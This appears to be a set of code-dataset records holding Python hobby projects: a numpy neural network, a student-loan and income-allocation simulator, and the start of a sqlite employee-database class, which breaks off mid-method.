+{"seq_id":"467285154","text":"import numpy as np\n\ndef nonlin(x,deriv=False):\n if(deriv==True):\n return x*(1-x)\n # print(str(x) + \" \" + str(1/(1+np.exp(-x))))\n return 1/(1+np.exp(-x))\n\nclass NeuralNetwork():\n def __init__(self):\n self.X = np.empty(0) # placeholder arrays, replaced on first load\n self.Y = np.empty(0)\n self.Xtest = np.empty(0)\n self.Ytest = np.empty(0)\n self.results = np.empty(0)\n np.random.seed(1)\n # np.seterr(over='raise')\n self.syn0 = 0.5*np.random.random((136*2,500)) - 0.25\n self.syn1 = 0.5*np.random.random((500,1)) - 0.25\n self.firstInput = True\n self.firstTestInput = True\n\n def load_test_match(self, training_data):\n if(self.firstTestInput):\n self.Xtest = np.array([training_data[0:136*2:1]])\n self.Ytest = np.array([[training_data[136*2]]])\n self.results = self.Ytest\n self.firstTestInput = False\n else:\n self.Xtest = np.append(self.Xtest, [training_data[0:136*2:1]], axis=0)\n self.Ytest = np.append(self.Ytest, [[training_data[136*2]]], axis=0)\n self.results = self.Ytest\n\n def clear_test_match(self, training_data):\n self.Xtest = np.empty(0)\n self.Ytest = np.empty(0)\n self.results = np.empty(0)\n self.firstTestInput = True\n\n def test(self):\n l0 = self.Xtest\n l1 = nonlin(np.dot(l0,self.syn0))\n l2 = nonlin(np.dot(l1,self.syn1))\n\n l2_error = self.Ytest - l2\n self.results = l2_error\n\n # for i in range(self.Ytest.size):\n # print(\"expected: \" + str(self.Ytest[i][0]) + \" got \" + str(l2[i][0]) + \" dif \" + str(\"{0:.5f}\".format(l2_error[i][0])))\n \n mse = (l2_error ** 2).mean(axis=0)\n print(\"test mse: \" + str(\"{0:.5f}\".format(mse[0])))\n return self.results\n\n def load_one_match(self, training_data):\n if(self.firstInput):\n self.X = np.array([training_data[0:136*2:1]])\n self.Y = np.array([[training_data[136*2]]])\n self.firstInput = False\n else:\n self.X = np.append(self.X, [training_data[0:136*2:1]], axis=0)\n self.Y = np.append(self.Y, [[training_data[136*2]]], axis=0)\n \n def train_times(self, n):\n for j in range(n):\n l0 = self.X\n l1 = nonlin(np.dot(l0,self.syn0))\n l2 = nonlin(np.dot(l1,self.syn1))\n\n l2_error = self.Y - l2\n\n if (j%1 == 0):\n mse = (l2_error ** 2).mean(axis=0)\n # for i in range(self.Y.size):\n # print(\"expected: \" + str(self.Y[i][0]) + \" got \" + str(l2[i][0]) + \" dif \" + str(\"{0:.5f}\".format(l2_error[i][0])))\n print(\"All champs mse: \" + str(\"{0:.5f}\".format(mse[0])))\n # print(\"Error:\" + str(np.abs(l2_error)))\n \n l2_delta = l2_error*nonlin(l2,deriv=True)\n\n l1_error = l2_delta.dot(self.syn1.T)\n\n l1_delta = l1_error*nonlin(l1,deriv=True)\n\n self.syn1 += 0.0003*l1.T.dot(l2_delta)\n self.syn0 += 0.0003*l0.T.dot(l1_delta)","sub_path":"src/neuralnetwork/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"552356702","text":"import pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport csv\n\ndef calcLivingExpenses(csvFile):\n with open(csvFile, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n i = 0\n for row in reader:\n i+=1\n groceriesAnalysis = pd.DataFrame(index=range(i),\n columns=['Item', 'StandardOrderQty', 'UnitPrice', 'UnitServings', 'ServingSize',\n 'ServingMetric', 'CaloriesPerServing', 'Carbs', 'Sugar', 'Fiber',\n 'Fat', 'Protein', 'ServingsConsumedPerDay', 'DaysUntilDepletion',\n '%CoverageWithinMonth', 'EstimatedMonthlyExpense'])\n i = 0\n for row in reader:\n print(row['Item'], row['NumUnits'], row['UnitPrice'], row['UnitServings'], row['ServingSize'])\n groceriesAnalysis.at[i, 'Item'] = row['Item']\n groceriesAnalysis.at[i, 'StandardOrderQty'] = row['NumUnits']\n groceriesAnalysis.at[i, 'UnitPrice'] = row['UnitPrice']\n groceriesAnalysis.at[i, 'UnitServings'] = row['UnitServings']\n groceriesAnalysis.at[i, 'ServingSize'] = row['ServingSize']\n groceriesAnalysis.at[i, 'ServingMetric'] = row['ServingMetric']\n groceriesAnalysis.at[i, 'CaloriesPerServing'] = row['Calories']\n groceriesAnalysis.at[i, 'Carbs'] = row['Carbs']\n groceriesAnalysis.at[i, 'Sugar'] = row['Sugar']\n groceriesAnalysis.at[i, 'Fiber'] = row['Fiber']\n groceriesAnalysis.at[i, 'Fat'] = row['Fat']\n groceriesAnalysis.at[i, 'Protein'] = row['Protein']\n groceriesAnalysis.at[i, 'ServingsConsumedPerDay'] = row['ServingsConsumedPerDay']\n daysUntilDepletion = row['NumUnits'] * round(1/(row['ServingsConsumedPerDay'] / row['UnitServings']), 3)\n groceriesAnalysis.at[i, 'DaysUntilDepletion'] = daysUntilDepletion\n coverageWithinMonth = round((daysUntilDepletion / 30.458), 3)\n groceriesAnalysis.at[i, '%CoverageWithinMonth'] = round(100 * coverageWithinMonth, 3)\n estimatedMonthlyExpense = round(row['UnitPrice'] * row['NumUnits'] * (1 / coverageWithinMonth), 3)\n groceriesAnalysis.at[i, 'EstimatedMonthlyExpense'] = estimatedMonthlyExpense\n i+=1\n return groceriesAnalysis\n\ndef defineLoanTerms(borrowedAmount, apr, duration):\n\n loanAnalysis = pd.DataFrame(index=range(duration*12),\n columns=['Year','Month','BoP_AccruedInterest', 'BoP_Principal', 'BoP_Balance', 'Payment',\n 'EoP_AmtAppliedTowardInterest', 'EoP_AmtAppliedTowardPrincipal', 'EoP_Balance',\n 'APR','Duration'])\n\n for i in range(0,len(loanAnalysis)):\n loanAnalysis.at[i, 'Month'] = i\n loanAnalysis.at[i, 'APR'] = apr\n loanAnalysis.at[i, 'Duration'] = duration\n #We assume the loan is DISBURSED ON THE 1st DAY OF THE 1st MONTH\n #We assume that starting in the very 1st month, INTEREST ACCRUES DAILY\n #We assume that the very 1st PAYMENT OCCURS ON 1st DAY OF THE 2nd MONTH\n loanAnalysis.at[0,'BoP_AccruedInterest'] = 0\n loanAnalysis.at[0,'BoP_Principal'] = borrowedAmount\n loanAnalysis.at[0,'BoP_Balance'] = borrowedAmount\n loanAnalysis.at[0,'Payment'] = 0\n loanAnalysis.at[0,'EoP_AmtAppliedTowardInterest'] = 0\n loanAnalysis.at[0,'EoP_AmtAppliedTowardPrincipal'] = 0\n\n dailyInterestRate = ((apr/100)/365)\n accruedInterest = 30 * (dailyInterestRate * loanAnalysis.at[0,'BoP_Balance'])\n loanAnalysis.at[0,'EoP_Balance'] = round(accruedInterest + loanAnalysis.at[0,'BoP_Balance'],2)\n\n loanAnalysis.at[1,'BoP_AccruedInterest'] = round(accruedInterest,2)\n loanAnalysis.at[1,'BoP_Principal'] = borrowedAmount\n loanAnalysis.at[1,'BoP_Balance'] = loanAnalysis.at[0,'EoP_Balance']\n\n return loanAnalysis\n\ndef processLoanPayment(loanInformation, currentPeriod, payment):\n\n loanDataFrame = loanInformation\n duration = 
loanDataFrame.at[0,'Duration']\n\n currentAccruedInterest = loanDataFrame.at[currentPeriod,'BoP_AccruedInterest']\n currentPrincipalBalance = loanDataFrame.at[currentPeriod,'BoP_Principal']\n currentTotalBalance = loanDataFrame.at[currentPeriod,'BoP_Balance']\n\n loanDataFrame.at[currentPeriod,'Payment'] = payment\n\n if(payment >= currentAccruedInterest): #We need this condition because at the very least, we must pay interest\n loanDataFrame.at[currentPeriod,'EoP_AmtAppliedTowardInterest'] = currentAccruedInterest\n loanDataFrame.at[currentPeriod,'EoP_AmtAppliedTowardPrincipal'] = payment - currentAccruedInterest\n loanDataFrame.at[currentPeriod,'EoP_Balance'] = currentTotalBalance - payment\n\n #testCondition = loanDataFrame.at[currentPeriod,'EoP_Balance']\n #print(testCondition)\n if(loanDataFrame.at[currentPeriod,'EoP_Balance'] <= 0.00):\n print(\"The loan has been fully serviced! Any excess payments will be remitted.\")\n return (True, loanInformation, currentPeriod)\n else:\n apr = loanDataFrame.at[0, 'APR']\n dailyInterestRate = ((apr/100)/365)\n accruedInterest = 30 * (dailyInterestRate * loanDataFrame.at[currentPeriod,'EoP_Balance'])\n\n whichPeriodToResume = (currentPeriod + 1)\n loanDataFrame.at[whichPeriodToResume, 'BoP_AccruedInterest'] = round(accruedInterest,2)\n loanDataFrame.at[whichPeriodToResume, 'BoP_Principal'] = round(loanDataFrame.at[currentPeriod,'EoP_Balance'],2)\n loanDataFrame.at[whichPeriodToResume, 'BoP_Balance'] = round(accruedInterest + loanDataFrame.at[whichPeriodToResume, 'BoP_Principal'],2)\n\n return (False, loanInformation, whichPeriodToResume)\n\ndef verifyOutstandingDebt(debtInformation, monthlyDebtPayment, dateOfPayment = 1):\n\n for i in range(0, 12):\n #print(\"Month #\",i)\n remainingDebt = processLoanPayment(debtInformation, dateOfPayment, monthlyDebtPayment)\n if (remainingDebt[0] is True):\n debtHasBeenServiced = True\n studentLoans = remainingDebt[1]\n dateOfPayment = remainingDebt[2]\n break\n else:\n debtHasBeenServiced = False\n studentLoans = remainingDebt[1]\n dateOfPayment = remainingDebt[2]\n\n #print(remainingDebt[1])\n return (debtHasBeenServiced, studentLoans, dateOfPayment)\n\ndef calcRequiredMonthlyPayment(debtPrincipal, debtIR, debtDuration, desiredDuration, preallocation):\n debtIR = (debtIR/100)\n expectedMonthlyPayment = (debtPrincipal * (debtIR / 12)) / (1 - ((1 + (debtIR / 12)) ** (-12 * debtDuration)))\n expectedMonthlyPayment = round(expectedMonthlyPayment, 2)\n\n capableTerm = -((math.log((-(((debtPrincipal*debtIR)/preallocation)-12))/12)) / (12 * math.log((12+debtIR)/12)))\n capableTerm = round(capableTerm, 2)\n minTime = capableTerm\n\n print(\"\\nREQUIRED Monthly payment is: $\", expectedMonthlyPayment)\n print(\"PLANNED Monthly payment is: $\", preallocation)\n\n timeReduction = round(100*((capableTerm - debtDuration)/debtDuration),2)\n temp = ''\n if(timeReduction > 0):\n temp = 'EXTENDED'\n else:\n temp = 'REDUCED'\n timeReduction = math.fabs(timeReduction)\n paymentRatio = round(100*preallocation/expectedMonthlyPayment,2)\n print(\"With a planned payment of $\",preallocation,\"(\",paymentRatio,\"% of required payment), \"\n \"the time required would be\",temp,\"by\", timeReduction,\"%\")\n\n neededPaymentToMeetTimeGoal = (debtPrincipal * (debtIR / 12)) / (1 - ((1 + (debtIR / 12)) ** (-12 * desiredDuration)))\n neededPaymentToMeetTimeGoal = round(neededPaymentToMeetTimeGoal,2)\n neededTimeReductionFromStatedTerm = round(math.fabs(100*(1-(1/(debtDuration/desiredDuration)))), 2)\n\n print(\"In order to service the debt 
within a desired time constraint of\",desiredDuration,\"years, the MINIMUM \"\n \"required monthly payment\\nwould have to be $\",neededPaymentToMeetTimeGoal,\". This would yield a\",\n neededTimeReductionFromStatedTerm, \"% time reduction from the stated\",debtDuration,\"year term of the debt.\\n\")\n\n x = []\n y = []\n preallocation = expectedMonthlyPayment\n for q in range(0,900):\n paymentRatio = round(100*preallocation/expectedMonthlyPayment,2)\n capableTerm = -((math.log((-(((debtPrincipal * debtIR) / preallocation) - 12)) / 12)) / (\n 12 * math.log((12 + debtIR) / 12)))\n capableTerm = round(capableTerm, 2)\n timeReduction = math.fabs( round(100 * ((capableTerm - debtDuration) / debtDuration), 2) )\n\n x.append(paymentRatio)\n y.append(timeReduction)\n preallocation += 10.0\n\n fig = plt.figure()\n fig.suptitle('Nonlinear Effect of Repayment Magnitude on Service Duration', fontsize=14)\n ax1 = fig.add_subplot(111)\n ax1.grid(True)\n ax1.scatter(x,y)\n ax1.set_ylim(0,108)\n ax1.set_title('DebtTerm = '+str(debtDuration)+\" years @ \"+str(debtIR*100)+\"% IR\")\n ax1.set_ylabel('% Time Reduction in Payoff')\n ax1.set_xlabel('Payment Ratio = (PlannedPMT / RequiredPMT)')\n # for i,j in zip(x,y):\n # ax1.annotate(str(j), xy=(i,j))\n\n #plt.show()\n return expectedMonthlyPayment, neededPaymentToMeetTimeGoal, minTime\n\ndef calcAsFractionOfMonthlyIncome(disposableIncome, monthlyAllocationFigure):\n biweeklyPay = round(disposableIncome / 26, 2)\n neededProportionOfMonthlyIncome = round(100*(monthlyAllocationFigure / (2 * biweeklyPay)),2)\n\n print(\"A monthly payment of $\", monthlyAllocationFigure, \"would entail a\",\n neededProportionOfMonthlyIncome, \"% allocation of the BASELINE year's monthly income.\\n\")\n return neededProportionOfMonthlyIncome\n\ndef simulatePostGradLife(startingIncome, annualRaiseRate, scope, debtBurden, presetIncomeAllocations, incrementalIncomeFreedom,\n proportionalRepayment):\n earnedIncome = startingIncome\n allocationForCHECKING = presetIncomeAllocations[0]\n allocationForLOANS = presetIncomeAllocations[1]\n allocationForINVESTMENTS = presetIncomeAllocations[2]\n splitTowardCHECKING = incrementalIncomeFreedom[0]\n splitTowardINVESTING = incrementalIncomeFreedom[1]\n\n if(proportionalRepayment is True):\n schoolLoansAreRepaidAsFixedProportionOfIncome = True\n elif(proportionalRepayment is False):\n schoolLoansAreRepaidAsFixedProportionOfIncome = False\n taxRate = 25.0 # percent tax incidence\n startingBoP = 2020\n studentLoans = debtBurden\n debtHasBeenServiced = False\n\n simulationOutput = pd.DataFrame(index=range(scope),\n columns=['Year', 'DisposableIncome', 'BiweeklyPay',\n '%Contrib_CHECKING',\n '$Contrib_CHECKING', # MONTHLY ALLOWANCE FOR CHECKING\n '%Contrib_SCHOOL_LOANS',\n '$Contrib_SCHOOL_LOANS', # MONTHLY LOAN PAYMENT\n '%Contrib_CARPAY',\n '$Contrib_CARPAY',\n '%Contrib_INVEST',\n '$Contrib_INVEST',\n 'SavedThusFar',\n 'HoldingsAfterROI',\n 'sumToOneCHECK'])\n\n #schoolLoansAreRepaidAsFixedProportionOfIncome = False\n for x in range(0, scope):\n print(\"BEGINNING Year #\", x)\n simulationOutput.at[x, 'Year'] = (startingBoP + x)\n if (x is 0):\n simulationOutput.at[x, 'DisposableIncome'] = round(earnedIncome * (1 - (taxRate / 100)), 2)\n simulationOutput.at[x, 'BiweeklyPay'] = round(simulationOutput.at[x, 'DisposableIncome'] / 26, 2)\n\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = allocationForLOANS\n\n monthlyLoanPayment = allocationForLOANS * simulationOutput.at[x, 'BiweeklyPay'] * 2\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = 
monthlyLoanPayment\n\n studentLoans = verifyOutstandingDebt(studentLoans, monthlyLoanPayment, dateOfPayment=1)\n\n if(studentLoans[0] is True):\n #If this condition is triggered, then we know that the debt has been FULLY SERVICED\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.0\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = 0.0\n\n else:\n wherePaymentsLeftOff = studentLoans[2]\n\n simulationOutput.at[x, '%Contrib_CHECKING'] = round(allocationForCHECKING,3)\n simulationOutput.at[x, '$Contrib_CHECKING'] = round(allocationForCHECKING * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n simulationOutput.at[x, '%Contrib_INVEST'] = round(allocationForINVESTMENTS,3)\n simulationOutput.at[x, '$Contrib_INVEST'] = round(allocationForINVESTMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n savedThusFar = (12 * simulationOutput.at[x, '$Contrib_INVEST'])\n simulationOutput.at[x, 'SavedThusFar'] = savedThusFar\n simulationOutput.at[x, 'HoldingsAfterROI'] = savedThusFar*(1.035)\n\n allocationForCARPAYMENTS = (1 - allocationForCHECKING - allocationForLOANS - allocationForINVESTMENTS)\n simulationOutput.at[x, '%Contrib_CARPAY'] = round(allocationForCARPAYMENTS,3)\n simulationOutput.at[x, '$Contrib_CARPAY'] = round(allocationForCARPAYMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n\n if (x > 0):\n earnedIncome = round(earnedIncome * (1 + annualRaiseRate / 100), 2)\n simulationOutput.at[x, 'DisposableIncome'] = round(earnedIncome * (1 - (taxRate / 100)), 2)\n simulationOutput.at[x, 'BiweeklyPay'] = round(simulationOutput.at[x, 'DisposableIncome'] / 26, 2)\n\n if(schoolLoansAreRepaidAsFixedProportionOfIncome is True):\n allocationForLOANS = simulationOutput.at[0, '%Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = allocationForLOANS\n monthlyLoanPayment = round(allocationForLOANS * (2 * simulationOutput.at[x, 'BiweeklyPay']), 2)\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = monthlyLoanPayment\n\n if(studentLoans[0] is True):\n # If this condition is triggered, then we know that the debt has been FULLY SERVICED\n incrementFreed = simulationOutput.at[x-1, '%Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.00\n else:\n wherePaymentsLeftOff = studentLoans[2]\n studentLoans = verifyOutstandingDebt(studentLoans[1], monthlyLoanPayment, dateOfPayment=wherePaymentsLeftOff)\n incrementFreed = 0.00\n\n elif(schoolLoansAreRepaidAsFixedProportionOfIncome is False):\n monthlyLoanPayment = simulationOutput.at[0, '$Contrib_SCHOOL_LOANS']\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = monthlyLoanPayment\n allocationForLOANS = monthlyLoanPayment / (2 * simulationOutput.at[x, 'BiweeklyPay'])\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = round(allocationForLOANS,3)\n\n if(studentLoans[0] is True):\n #If this condition is triggered, then we know that the debt has been FULLY SERVICED\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] = 0.00\n simulationOutput.at[x, '$Contrib_SCHOOL_LOANS'] = 0.00\n else:\n wherePaymentsLeftOff = studentLoans[2]\n studentLoans = verifyOutstandingDebt(studentLoans[1], monthlyLoanPayment, dateOfPayment = wherePaymentsLeftOff)\n incrementFreed = simulationOutput.at[x - 1, '%Contrib_SCHOOL_LOANS'] \\\n - simulationOutput.at[x, '%Contrib_SCHOOL_LOANS']\n\n #df = studentLoans[1]\n #print(df['Payments'])\n\n allocationForINVESTMENTS = (incrementFreed * splitTowardINVESTING) + simulationOutput.at[x - 1, '%Contrib_INVEST']\n allocationForCHECKING = (incrementFreed * splitTowardCHECKING) + simulationOutput.at[x - 1, 
'%Contrib_CHECKING']\n\n simulationOutput.at[x, '%Contrib_INVEST'] = round(allocationForINVESTMENTS,3)\n simulationOutput.at[x, '$Contrib_INVEST'] = round(allocationForINVESTMENTS * (2 * simulationOutput.at[x, 'BiweeklyPay']),2)\n savedThusFar = (12 * simulationOutput.at[x, '$Contrib_INVEST']) + simulationOutput.at[x - 1, 'SavedThusFar']\n simulationOutput.at[x, 'SavedThusFar'] = savedThusFar\n\n simulationOutput.at[x, 'HoldingsAfterROI'] = savedThusFar*1.035\n\n simulationOutput.at[x, '%Contrib_CHECKING'] = round(allocationForCHECKING,3)\n simulationOutput.at[x, '$Contrib_CHECKING'] = round(allocationForCHECKING * (2 * simulationOutput.at[x, 'BiweeklyPay']),2)\n\n allocationForCARPAYMENTS = (1 - allocationForCHECKING - allocationForLOANS - allocationForINVESTMENTS)\n simulationOutput.at[x, '%Contrib_CARPAY'] = round(allocationForCARPAYMENTS,3)\n simulationOutput.at[x, '$Contrib_CARPAY'] = round(allocationForCARPAYMENTS * simulationOutput.at[x, 'BiweeklyPay'] * 2,2)\n\n simulationOutput.at[x, 'sumToOneCHECK'] = simulationOutput.at[x, '%Contrib_CHECKING'] + \\\n simulationOutput.at[x, '%Contrib_INVEST'] + \\\n simulationOutput.at[x, '%Contrib_SCHOOL_LOANS'] + \\\n simulationOutput.at[x, '%Contrib_CARPAY']\n\n\n #print(simulationOutput['$Contrib_INVEST'])\n print(simulationOutput['SavedThusFar'])\n\n # print(simulationOutput['%Contrib_CHECKING'],'\\n',simulationOutput['%Contrib_SCHOOL_LOANS'],'\\n',\n # simulationOutput['%Contrib_INVEST'],'\\n',simulationOutput['%Contrib_CARPAY'],'\\n')\n return simulationOutput, studentLoans[1]\n\n\nexpenses = calcLivingExpenses('listOfGoods.csv')\n#print(expenses)\n\n\n'''\nIf disposable income rises each year, and loan repayments are held constant, then the proportion of income that's\ndirected toward repayment will gradually become smaller as time goes on. The year-over-year difference in this fraction\nof income is called the INCREMENT-FREED. It represents the proportion of income that has become available for other uses\nEach year the INCREMENT-FREED is used to direct more income to both INVESTING & CHECKING. 
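For example, holding a $700 loan payment fixed while monthly take-home pay grows from $4,000 to $4,200 cuts the repayment share from 17.5% to roughly 16.7%, freeing about 0.8% of income. 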
The split is defined by the\nFREED-INCOME SPLIT rules.\n'''\n\n#Simulation Settings\nscope = 12#years\nearnedIncome = 65000#dollars\nannualRaiseRate = 3.5#percent\ntermsOfDebt = (100000, 9.1, 15)\ncollegeDebt = defineLoanTerms(termsOfDebt[0], termsOfDebt[1], termsOfDebt[2])\nidealServicingDuration = 6#years\nsplitTowardCHECKING = 0.35\nsplitTowardINVESTING = 0.65\nincrementalIncomeFreedom = (splitTowardCHECKING, splitTowardINVESTING)\nallocationForCHECKING = 0.50\nallocationForDEBT_PMT = 0.4495 #0.3706\nallocationForINVESTING = 0.0505\ninitialAllocations = (allocationForCHECKING, allocationForDEBT_PMT, allocationForINVESTING)\n\ndebtDuration = termsOfDebt[2]\nmaxPaymentTowardDebt = (0.899 * allocationForCHECKING * (1-0.25) * (65000/26) * 2)\nreqPMT, idealPMT, capableTerm = calcRequiredMonthlyPayment(termsOfDebt[0], termsOfDebt[1], termsOfDebt[2],\n debtDuration, maxPaymentTowardDebt)\nprint(\"If the allocation for debt repayment is set to\",round(100 * 0.899 * allocationForCHECKING,2),\"% then the debt \"\n \"can be serviced within\",round(capableTerm,2),\"years.\")\n\n\nfixdREPMTresults, debtServicing1 = simulatePostGradLife(earnedIncome, annualRaiseRate, scope, collegeDebt, initialAllocations,\n incrementalIncomeFreedom, False)\npropREPMTresults, debtServicing2 = simulatePostGradLife(earnedIncome, annualRaiseRate, scope, collegeDebt, initialAllocations,\n incrementalIncomeFreedom, True)\n\n# for x in range(0, len(debtServicing1)):\n# print(debtServicing1.at[x, 'Month'], \" \", debtServicing1.at[x, 'BoP_Principal'], \" \",\n# debtServicing1.at[x, 'BoP_Balance'], \" \", debtServicing1.at[x, 'Payment'], \" \",\n# debtServicing1.at[x, 'EoP_AmtAppliedTowardInterest'], \" \", debtServicing1.at[x, 'EoP_AmtAppliedTowardPrincipal'], \" \",\n# debtServicing1.at[x, 'EoP_Balance'])\n# totalPaidInInterest = round(debtServicing1['EoP_AmtAppliedTowardInterest'].sum(),2)\n# print(\"You paid $\",totalPaidInInterest,\" in interest!\")\n\n# count = 1\n# for q in range(count,9):\n# nameOfPanel = 'ax'+str(count)\n# panelAssignment = nameOfPanel+'fig.add_subplot(42'+str(count)+')'\n# barChartAssignment = \"coordinatesForBarChart = \"+nameOfPanel+\".bar(fixdREPMTresults['Year'], fixdREPMTresults['DisposableIncome'])\"\n# eval(nameOfPanel+\".set_xlabel('Year')\")\n#\n# eval(nameOfPanel + \".set_title('Biweekly Pay')\")\n# eval(nameOfPanel + \".set_ylabel('Dollar Income')\")\n\n# fig = plt.figure()\n# fig.suptitle('Dashboard Controls', fontsize=20)\n#\n# ax1 = fig.add_subplot(421)\n# coordinatesForBarChart = ax1.bar(fixdREPMTresults['Year'], fixdREPMTresults['DisposableIncome'])\n# ax1.set_title('Biweekly Pay')\n# ax1.set_ylabel('Dollar Income')\n# ax1.set_xlabel('Year')\n# for i in ax1.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax1.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax2 = fig.add_subplot(422)\n# coordinatesForBarChart = ax2.bar(fixdREPMTresults['Year'], fixdREPMTresults['BiweeklyPay'])\n# ax2.set_title('Biweekly Pay')\n# ax2.set_ylabel('Dollar Income')\n# ax2.set_xlabel('Year')\n# for i in ax2.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax2.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax3 = fig.add_subplot(423)\n# coordinatesForBarChart = ax3.bar(fixdREPMTresults['Year'], fixdREPMTresults['$Contrib_INVEST'])\n# ax3.set_title('Funds for Investing (Fixed RePMT)')\n# ax3.set_ylabel('Monthly Allocation')\n# 
ax3.set_xlabel('Year')\n# for i in ax3.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax3.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax4 = fig.add_subplot(424)\n# coordinatesForBarChart = ax4.bar(propREPMTresults['Year'], propREPMTresults['$Contrib_INVEST'])\n# ax4.set_title('Funds for Investing (Proportional RePMT)')\n# ax4.set_ylabel('Monthly Allocation')\n# ax4.set_xlabel('Year')\n# for i in ax4.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax4.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax5 = fig.add_subplot(425)\n# coordinatesForBarChart = ax5.bar(fixdREPMTresults['Year'], fixdREPMTresults['SavedThusFar'])\n# ax5.set_title('Cumulative Savings (Fixed RePMT)')\n# ax5.set_ylabel('Value of Holdings')\n# ax5.set_xlabel('Year')\n# for i in ax5.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax5.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax6 = fig.add_subplot(426)\n# coordinatesForBarChart = ax6.bar(propREPMTresults['Year'], propREPMTresults['SavedThusFar'])\n# ax6.set_title('Cumulative Savings (Proportional RePMT)')\n# ax6.set_ylabel('Value of Holdings')\n# ax6.set_xlabel('Year')\n# for i in ax6.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax6.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax7 = fig.add_subplot(427)\n# coordinatesForBarChart = ax7.bar(fixdREPMTresults['Year'], fixdREPMTresults['$Contrib_CHECKING'])\n# ax7.set_title('Funds for Living Expenses (Fixed RePMT)')\n# ax7.set_ylabel('Monthly Allocation')\n# ax7.set_xlabel('Year')\n# for i in ax7.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax7.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=8, color='black')\n#\n# ax8 = fig.add_subplot(428)\n# coordinatesForBarChart = ax8.bar(propREPMTresults['Year'], propREPMTresults['$Contrib_CHECKING'])\n# ax8.set_title('Funds for Living Expenses (Proportional RePMT)')\n# ax8.set_ylabel('Monthly Allocation')\n# ax8.set_xlabel('Year')\n# for i in ax8.patches:\n# # get_x pulls left or right; get_height pushes up or down\n# ax8.text(i.get_x()-.03, i.get_height()+.5, '$'+str(round( i.get_height(), 2)), fontsize=12, color='black')\n#\n# plt.show()\n\n\n\n\n# ax1 = fig.add_subplot(321)\n# x = output['Year']\n# y = output['$Contrib_INVEST']\n# ax1.plot(x,y)\n# ax1.set_ylim(output['$Contrib_INVEST'].min(),output['$Contrib_INVEST'].max()*1.05)\n# ax1.set_title('Dollar Contribution toward Investments')\n# ax1.set_ylabel('Monthly Allocation')\n# ax1.set_xlabel('Year')\n# for i,j in zip(x,y):\n# ax1.annotate(str(j), xy=(i,j))","sub_path":"personalFinances.py","file_name":"personalFinances.py","file_ext":"py","file_size_in_byte":25288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535557800","text":"import sqlite3\r\nfrom idata_access import IDataAccess\r\nfrom data import Data\r\n\r\n\r\nclass Database(IDataAccess):\r\n # Written By Vaishali\r\n # This is the MySQL Database connection class\r\n #\r\n #\r\n def __init__(self):\r\n # Written By Vaishali\r\n # The first method __init__() is a special method,\r\n # which is called class constructor or initialization method\r\n # creates to null veriable\r\n #\r\n self.conn = None\r\n 
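# (added note) conn and cursor stay None until create_db_connection() below succeeds\r\n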
 self.cursor = None\r\n self.create_db_connection(\"staffinfo\")\r\n\r\n def create_db_connection(self, database_name):\r\n # Written by Vaishali\r\n #\r\n # This method creates the connection with the database.\r\n #\r\n # Tries to handle the error if\r\n # no connection can be made; makes the connection otherwise.\r\n #\r\n # When the database connects successfully, the conn attribute is given\r\n # the connection object\r\n # and the cursor the cursor object.\r\n #\r\n # It then calls the make_tables method.\r\n #\r\n try:\r\n self.conn = sqlite3.connect(database_name)\r\n self.cursor = self.conn.cursor()\r\n self.make_tables() # call make_table method here\r\n except (ConnectionError, TypeError) as err: # If type error\r\n print(err) # Raised when an operation or function is attempted\r\n except Exception as e: # that is invalid for the specified data type.\r\n print(e)\r\n\r\n def make_tables(self):\r\n # Written By Vaishali\r\n #\r\n # This is called from the create_db_connection method.\r\n # Create the employee table within the database.\r\n #\r\n # This only happens if the table doesn't exist.\r\n #\r\n #\r\n # drop_table if exists\r\n\r\n make_table = \"\"\"CREATE TABLE IF NOT EXISTS EMPLOYEE ({0} VARCHAR(6),\r\n {1} CHAR, {2} INTEGER, {3} INTEGER, \r\n {4} VARCHAR(15), {5} INTEGER, {6} DATE);\"\"\"\r\n make_table = self.format_col(make_table)\r\n self.cursor.execute (make_table)\r\n self.conn.commit ()\r\n\r\n def format_col(self, sql):\r\n return sql.format(Data.EMPID.name,\r\n Data.GENDER.name,\r\n Data.AGE.name,\r\n Data.SALES.name,\r\n Data.BMI.name,\r\n Data.SALARY.name,\r\n Data.BIRTHDAY.name)\r\n\r\n def insert_employee_data(self, data_row):\r\n # Written By Vaishali\r\n 